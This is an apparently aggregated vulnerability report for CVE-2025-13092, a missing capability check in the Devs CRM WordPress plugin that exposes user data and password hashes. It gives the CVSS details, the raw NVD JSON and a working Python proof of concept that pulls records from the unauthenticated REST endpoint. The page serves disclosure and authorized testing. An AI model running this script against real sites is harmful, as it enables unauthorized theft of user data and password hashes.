Security Vulnerability Report
中文
CVE-2025-13092 CVSS 5.3 MEDIUM

CVE-2025-13092

Published: 2025-12-13 16:16:47
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Devs CRM – Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the /wp-json/devs-crm/v1/attendances REST API Endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to retrieve private user data, including password hashes.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Devs CRM插件 <= 1.1.8(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-13092 PoC - Unauthenticated Access to Devs CRM REST API # Target: WordPress site with Devs CRM plugin <= 1.1.8 def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-13092 """ # Construct the vulnerable REST API endpoint endpoint = f"{target_url.rstrip('/')}/wp-json/devs-crm/v1/attendances" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json' } print(f"[*] Testing endpoint: {endpoint}") try: # Send unauthenticated GET request response = requests.get(endpoint, headers=headers, timeout=10, verify=False) print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: data = response.json() print(f"[+] VULNERABLE! Retrieved {len(data)} records") print(f"[+] Sample data: {json.dumps(data[:2] if len(data) > 2 else data, indent=2)}") return True else: print(f"[-] Not vulnerable or endpoint not found") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print("Usage: python cve-2025-13092.py http://target.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13092", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:46.993", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Devs CRM – Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the /wp-json/devs-crm/v1/attendances REST API Endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to retrieve private user data, including password hashes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/devs-crm/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c67c520d-4843-4ef1-8c96-cbf0eaab58cb?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.